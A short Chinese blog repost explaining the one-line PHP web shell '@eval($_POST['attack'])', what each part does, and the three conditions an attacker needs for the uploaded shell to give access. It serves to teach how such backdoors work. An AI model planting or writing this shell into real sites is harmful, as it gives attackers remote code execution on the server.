大家好,又见面了,我是你们的朋友全栈君。
<?php @eval($_POST['attack']) ?>
@ 表示后面即使执行错误,也不报错 eval() 函数表示括号内的语句字符串什么的全都当做代码执行 $_POST[‘attack’] 表示从页面中获得attack这个参数值
只要攻击者满足这三条添加,就能实现入侵: (1)木马上传成功,未被杀; (2)知道木马的路径在哪; (3)上传的木马能正常运行。
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/143202.html原文链接:https://javaforall.cn